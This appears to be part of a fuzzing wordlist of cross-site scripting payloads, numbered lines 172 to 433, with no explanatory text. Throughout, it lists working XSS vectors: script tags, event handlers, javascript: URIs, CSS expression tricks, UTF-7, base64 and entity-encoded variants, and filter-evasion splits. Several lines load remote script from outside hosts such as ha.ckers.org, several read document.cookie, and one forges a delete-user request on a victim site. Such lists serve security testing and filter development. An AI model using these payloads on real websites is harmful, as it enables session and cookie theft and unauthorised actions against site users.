172 | LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style>
173 | <script>({0:#0=alert/#0#/#0#(0)})</script>
174 | <svg xmlns="http://www.w3.org/2000/svg">LOL<script>alert(123)</script></svg>
175 | &lt;SCRIPT&gt;alert(/XSS/&#46;source)&lt;/SCRIPT&gt;
176 | \\";alert('XSS');//
177 | &lt;/TITLE&gt;&lt;SCRIPT&gt;alert(\"XSS\");&lt;/SCRIPT&gt;
178 | &lt;INPUT TYPE=\"IMAGE\" SRC=\"javascript&#058;alert('XSS');\"&gt;
179 | &lt;BODY BACKGROUND=\"javascript&#058;alert('XSS')\"&gt;
180 | &lt;BODY ONLOAD=alert('XSS')&gt;
181 | &lt;IMG DYNSRC=\"javascript&#058;alert('XSS')\"&gt;
182 | &lt;IMG LOWSRC=\"javascript&#058;alert('XSS')\"&gt;
183 | &lt;BGSOUND SRC=\"javascript&#058;alert('XSS');\"&gt;
184 | &lt;BR SIZE=\"&{alert('XSS')}\"&gt;
185 | &lt;LAYER SRC=\"http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html\"&gt;&lt;/LAYER&gt;
186 | &lt;LINK REL=\"stylesheet\" HREF=\"javascript&#058;alert('XSS');\"&gt;
187 | &lt;LINK REL=\"stylesheet\" HREF=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;css\"&gt;
188 | &lt;STYLE&gt;@import'http&#58;//ha&#46;ckers&#46;org/xss&#46;css';&lt;/STYLE&gt;
189 | &lt;META HTTP-EQUIV=\"Link\" Content=\"&lt;http&#58;//ha&#46;ckers&#46;org/xss&#46;css&gt;; REL=stylesheet\"&gt;
190 | &lt;STYLE&gt;BODY{-moz-binding&#58;url(\"http&#58;//ha&#46;ckers&#46;org/xssmoz&#46;xml#xss\")}&lt;/STYLE&gt;
191 | &lt;XSS STYLE=\"behavior&#58; url(xss&#46;htc);\"&gt;
192 | &lt;STYLE&gt;li {list-style-image&#58; url(\"javascript&#058;alert('XSS')\");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS
193 | &lt;IMG SRC='vbscript&#058;msgbox(\"XSS\")'&gt;
194 | &lt;IMG SRC=\"mocha&#58;&#91;code&#93;\"&gt;
195 | &lt;IMG SRC=\"livescript&#058;&#91;code&#93;\"&gt;
196 | žscriptualert(EXSSE)ž/scriptu
197 | &lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript&#058;alert('XSS');\"&gt;
198 | &lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data&#58;text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\"&gt;
199 | &lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http&#58;//;URL=javascript&#058;alert('XSS');\"
200 | &lt;IFRAME SRC=\"javascript&#058;alert('XSS');\"&gt;&lt;/IFRAME&gt;
201 | &lt;FRAMESET&gt;&lt;FRAME SRC=\"javascript&#058;alert('XSS');\"&gt;&lt;/FRAMESET&gt;
202 | &lt;TABLE BACKGROUND=\"javascript&#058;alert('XSS')\"&gt;
203 | &lt;TABLE&gt;&lt;TD BACKGROUND=\"javascript&#058;alert('XSS')\"&gt;
204 | &lt;DIV STYLE=\"background-image&#58; url(javascript&#058;alert('XSS'))\"&gt;
205 | &lt;DIV STYLE=\"background-image&#58;\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028&#46;1027\0058&#46;1053\0053\0027\0029'\0029\"&gt;
206 | &lt;DIV STYLE=\"background-image&#58; url(javascript&#058;alert('XSS'))\"&gt;
207 | &lt;DIV STYLE=\"width&#58; expression(alert('XSS'));\"&gt;
208 | &lt;STYLE&gt;@im\port'\ja\vasc\ript&#58;alert(\"XSS\")';&lt;/STYLE&gt;
209 | &lt;IMG STYLE=\"xss&#58;expr/*XSS*/ession(alert('XSS'))\"&gt;
210 | &lt;XSS STYLE=\"xss&#58;expression(alert('XSS'))\"&gt;
211 | exp/*&lt;A STYLE='no\xss&#58;noxss(\"*//*\");
212 | xss&#58;ex&#x2F;*XSS*//*/*/pression(alert(\"XSS\"))'&gt;
213 | &lt;STYLE TYPE=\"text/javascript\"&gt;alert('XSS');&lt;/STYLE&gt;
214 | &lt;STYLE&gt;&#46;XSS{background-image&#58;url(\"javascript&#058;alert('XSS')\");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;
215 | &lt;STYLE type=\"text/css\"&gt;BODY{background&#58;url(\"javascript&#058;alert('XSS')\")}&lt;/STYLE&gt;
216 | &lt;!--&#91;if gte IE 4&#93;&gt;
217 | &lt;SCRIPT&gt;alert('XSS');&lt;/SCRIPT&gt;
218 | &lt;!&#91;endif&#93;--&gt;
219 | &lt;BASE HREF=\"javascript&#058;alert('XSS');//\"&gt;
220 | &lt;OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html\"&gt;&lt;/OBJECT&gt;
221 | &lt;OBJECT classid=clsid&#58;ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript&#058;alert('XSS')&gt;&lt;/OBJECT&gt;
222 | &lt;EMBED SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;swf\" AllowScriptAccess=\"always\"&gt;&lt;/EMBED&gt;
223 | &lt;EMBED SRC=\"data&#58;image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"&gt;&lt;/EMBED&gt;
224 | a=\"get\";
225 | b=\"URL(\\"\";
226 | c=\"javascript&#058;\";
227 | d=\"alert('XSS');\\")\";
228 | eval(a+b+c+d);
229 | &lt;HTML xmlns&#58;xss&gt;&lt;?import namespace=\"xss\" implementation=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;htc\"&gt;&lt;xss&#58;xss&gt;XSS&lt;/xss&#58;xss&gt;&lt;/HTML&gt;
230 | &lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;!&#91;CDATA&#91;&lt;IMG SRC=\"javas&#93;&#93;&gt;&lt;!&#91;CDATA&#91;cript&#58;alert('XSS');\"&gt;&#93;&#93;&gt;
231 | &lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;
232 | &lt;XML ID=\"xss\"&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=\"javas&lt;!-- --&gt;cript&#58;alert('XSS')\"&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;
233 | &lt;SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"&gt;&lt;/SPAN&gt;
234 | &lt;XML SRC=\"xsstest&#46;xml\" ID=I&gt;&lt;/XML&gt;
235 | &lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;
236 | &lt;HTML&gt;&lt;BODY&gt;
237 | &lt;?xml&#58;namespace prefix=\"t\" ns=\"urn&#58;schemas-microsoft-com&#58;time\"&gt;
238 | &lt;?import namespace=\"t\" implementation=\"#default#time2\"&gt;
239 | &lt;t&#58;set attributeName=\"innerHTML\" to=\"XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;\"&gt;
240 | &lt;/BODY&gt;&lt;/HTML&gt;
241 | &lt;SCRIPT SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;jpg\"&gt;&lt;/SCRIPT&gt;
242 | &lt;!--#exec cmd=\"/bin/echo '&lt;SCR'\"--&gt;&lt;!--#exec cmd=\"/bin/echo 'IPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js&gt;&lt;/SCRIPT&gt;'\"--&gt;
243 | &lt;? echo('&lt;SCR)';
244 | echo('IPT&gt;alert(\"XSS\")&lt;/SCRIPT&gt;'); ?&gt;
245 | &lt;IMG SRC=\"http&#58;//www&#46;thesiteyouareon&#46;com/somecommand&#46;php?somevariables=maliciouscode\"&gt;
246 | Redirect 302 /a&#46;jpg http&#58;//victimsite&#46;com/admin&#46;asp&deleteuser
247 | &lt;META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;\"&gt;
248 | &lt;HEAD&gt;&lt;META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
249 | &lt;SCRIPT a=\"&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
250 | &lt;SCRIPT =\"&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
251 | &lt;SCRIPT a=\"&gt;\" '' SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
252 | &lt;SCRIPT \"a='&gt;'\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
253 | &lt;SCRIPT a=`&gt;` SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
254 | &lt;SCRIPT a=\"&gt;'&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
255 | &lt;SCRIPT&gt;document&#46;write(\"&lt;SCRI\");&lt;/SCRIPT&gt;PT SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
256 | &lt;A HREF=\"http&#58;//66&#46;102&#46;7&#46;147/\"&gt;XSS&lt;/A&gt;
257 | &lt;A HREF=\"http&#58;//%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\"&gt;XSS&lt;/A&gt;
258 | &lt;A HREF=\"http&#58;//1113982867/\"&gt;XSS&lt;/A&gt;
259 | &lt;A HREF=\"http&#58;//0x42&#46;0x0000066&#46;0x7&#46;0x93/\"&gt;XSS&lt;/A&gt;
260 | &lt;A HREF=\"http&#58;//0102&#46;0146&#46;0007&#46;00000223/\"&gt;XSS&lt;/A&gt;
261 | &lt;A HREF=\"htt p&#58;//6 6&#46;000146&#46;0x7&#46;147/\"&gt;XSS&lt;/A&gt;
262 | &lt;A HREF=\"//www&#46;google&#46;com/\"&gt;XSS&lt;/A&gt;
263 | &lt;A HREF=\"//google\"&gt;XSS&lt;/A&gt;
264 | &lt;A HREF=\"http&#58;//ha&#46;ckers&#46;org@google\"&gt;XSS&lt;/A&gt;
265 | &lt;A HREF=\"http&#58;//google&#58;ha&#46;ckers&#46;org\"&gt;XSS&lt;/A&gt;
266 | &lt;A HREF=\"http&#58;//google&#46;com/\"&gt;XSS&lt;/A&gt;
267 | &lt;A HREF=\"http&#58;//www&#46;google&#46;com&#46;/\"&gt;XSS&lt;/A&gt;
268 | &lt;A HREF=\"javascript&#058;document&#46;location='http&#58;//www&#46;google&#46;com/'\"&gt;XSS&lt;/A&gt;
269 | &lt;A HREF=\"http&#58;//www&#46;gohttp&#58;//www&#46;google&#46;com/ogle&#46;com/\"&gt;XSS&lt;/A&gt;
270 | &lt;
271 | %3C
272 | &lt
273 | &lt;
274 | &LT
275 | &LT;
276 | &#60
277 | &#060
278 | &#0060
279 | &#00060
280 | &#000060
281 | &#0000060
282 | &lt;
283 | &#x3c
284 | &#x03c
285 | &#x003c
286 | &#x0003c
287 | &#x00003c
288 | &#x000003c
289 | &#x3c;
290 | &#x03c;
291 | &#x003c;
292 | &#x0003c;
293 | &#x00003c;
294 | &#x000003c;
295 | &#X3c
296 | &#X03c
297 | &#X003c
298 | &#X0003c
299 | &#X00003c
300 | &#X000003c
301 | &#X3c;
302 | &#X03c;
303 | &#X003c;
304 | &#X0003c;
305 | &#X00003c;
306 | &#X000003c;
307 | &#x3C
308 | &#x03C
309 | &#x003C
310 | &#x0003C
311 | &#x00003C
312 | &#x000003C
313 | &#x3C;
314 | &#x03C;
315 | &#x003C;
316 | &#x0003C;
317 | &#x00003C;
318 | &#x000003C;
319 | &#X3C
320 | &#X03C
321 | &#X003C
322 | &#X0003C
323 | &#X00003C
324 | &#X000003C
325 | &#X3C;
326 | &#X03C;
327 | &#X003C;
328 | &#X0003C;
329 | &#X00003C;
330 | &#X000003C;
331 | \x3c
332 | \x3C
333 | \u003c
334 | \u003C
335 | &lt;iframe src=http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html&gt;
336 | &lt;IMG SRC=\"javascript&#058;alert('XSS')\"
337 | &lt;SCRIPT SRC=//ha&#46;ckers&#46;org/&#46;js&gt;
338 | &lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js?&lt;B&gt;
339 | &lt;&lt;SCRIPT&gt;alert(\"XSS\");//&lt;&lt;/SCRIPT&gt;
340 | &lt;SCRIPT/SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
341 | &lt;BODY onload!#$%&()*~+-_&#46;,&#58;;?@&#91;/|\&#93;^`=alert(\"XSS\")&gt;
342 | &lt;SCRIPT/XSS SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
343 | &lt;IMG SRC=\"   javascript&#058;alert('XSS');\"&gt;
344 | perl -e 'print \"&lt;SCR\0IPT&gt;alert(\\"XSS\\")&lt;/SCR\0IPT&gt;\";' &gt; out
345 | perl -e 'print \"&lt;IMG SRC=java\0script&#058;alert(\\"XSS\\")&gt;\";' &gt; out
346 | &lt;IMG SRC=\"jav&#x0D;ascript&#058;alert('XSS');\"&gt;
347 | &lt;IMG SRC=\"jav&#x0A;ascript&#058;alert('XSS');\"&gt;
348 | &lt;IMG SRC=\"jav&#x09;ascript&#058;alert('XSS');\"&gt;
349 | &lt;IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29&gt;
350 | &lt;IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041&gt;
351 | &lt;IMG SRC=javascript&#058;alert('XSS')&gt;
352 | &lt;IMG SRC=javascript&#058;alert(String&#46;fromCharCode(88,83,83))&gt;
353 | &lt;IMG \"\"\"&gt;&lt;SCRIPT&gt;alert(\"XSS\")&lt;/SCRIPT&gt;\"&gt;
354 | &lt;IMG SRC=`javascript&#058;alert(\"RSnake says, 'XSS'\")`&gt;
355 | &lt;IMG SRC=javascript&#058;alert(&quot;XSS&quot;)&gt;
356 | &lt;IMG SRC=JaVaScRiPt&#058;alert('XSS')&gt;
357 | &lt;IMG SRC=javascript&#058;alert('XSS')&gt;
358 | &lt;IMG SRC=\"javascript&#058;alert('XSS');\"&gt;
359 | &lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js&gt;&lt;/SCRIPT&gt;
360 | '';!--\"&lt;XSS&gt;=&{()}
361 | ';alert(String&#46;fromCharCode(88,83,83))//\';alert(String&#46;fromCharCode(88,83,83))//\";alert(String&#46;fromCharCode(88,83,83))//\\";alert(String&#46;fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;\"&gt;'&gt;&lt;SCRIPT&gt;alert(String&#46;fromCharCode(88,83,83))&lt;/SCRIPT&gt;
362 | ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
363 | '';!--"<XSS>=&{()}
364 | <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
365 | <IMG SRC="javascript:alert('XSS');">
366 | <IMG SRC=javascript:alert('XSS')>
367 | <IMG SRC=javascrscriptipt:alert('XSS')>
368 | <IMG SRC=JaVaScRiPt:alert('XSS')>
369 | <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
370 | <IMG SRC=" &#14;  javascript:alert('XSS');">
371 | <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
372 | <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
373 | <<SCRIPT>alert("XSS");//<</SCRIPT>
374 | <SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
375 | \";alert('XSS');//
376 | </TITLE><SCRIPT>alert("XSS");</SCRIPT>
377 | ¼script¾alert(¢XSS¢)¼/script¾
378 | <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
379 | <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
380 | <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
381 | <TABLE BACKGROUND="javascript:alert('XSS')">
382 | <TABLE><TD BACKGROUND="javascript:alert('XSS')">
383 | <DIV STYLE="background-image: url(javascript:alert('XSS'))">
384 | <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
385 | <DIV STYLE="width: expression(alert('XSS'));">
386 | <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
387 | <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
388 | <XSS STYLE="xss:expression(alert('XSS'))">
389 | exp/*<A STYLE='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'>
390 | <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
391 | a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e);
392 | <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
393 | <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;"></BODY></HTML>
394 | <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
395 | <form id="test" /><button form="test" formaction="javascript:alert(123)">TESTHTML5FORMACTION
396 | <form><button formaction="javascript:alert(123)">crosssitespt
397 | <frameset onload=alert(123)>
398 | <!--<img src="--><img src=x onerror=alert(123)//">
399 | <style><img src="</style><img src=x onerror=alert(123)//">
400 | <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
401 | <embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
402 | <embed src="javascript:alert(1)">
403 | <? foo="><script>alert(1)</script>">
404 | <! foo="><script>alert(1)</script>">
405 | </ foo="><script>alert(1)</script>">
406 | <script>({0:#0=alert/#0#/#0#(123)})</script>
407 | <script>ReferenceError.prototype.__defineGetter__('name', function(){alert(123)}),x</script>
408 | <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>
409 | <script src="#">{alert(1)}</script>;1
410 | <script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>
411 | <svg xmlns="#"><script>alert(1)</script></svg>
412 | <svg onload="javascript:alert(123)" xmlns="#"></svg>
413 | <iframe xmlns="#" src="javascript:alert(1)"></iframe>
414 | +ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
415 | %2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-
416 | +ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-
417 | %2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-
418 | %253cscript%253ealert(document.cookie)%253c/script%253e
419 | “><s”%2b”cript>alert(document.cookie)</script>
420 | “><ScRiPt>alert(document.cookie)</script>
421 | “><<script>alert(document.cookie);//<</script>
422 | foo<script>alert(document.cookie)</script>
423 | <scr<script>ipt>alert(document.cookie)</scr</script>ipt>
424 | %22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E
425 | ‘; alert(document.cookie); var foo=’
426 | foo\’; alert(document.cookie);//’;
427 | </script><script >alert(document.cookie)</script>
428 | <img src=asdf onerror=alert(document.cookie)>
429 | <BODY ONLOAD=alert(’XSS’)>
430 | <script>alert(1)</script>
431 | "><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script>
432 | <video src=1 onerror=alert(1)>
433 | <audio src=1 onerror=alert(1)>


--------------------------------------------------------------------------------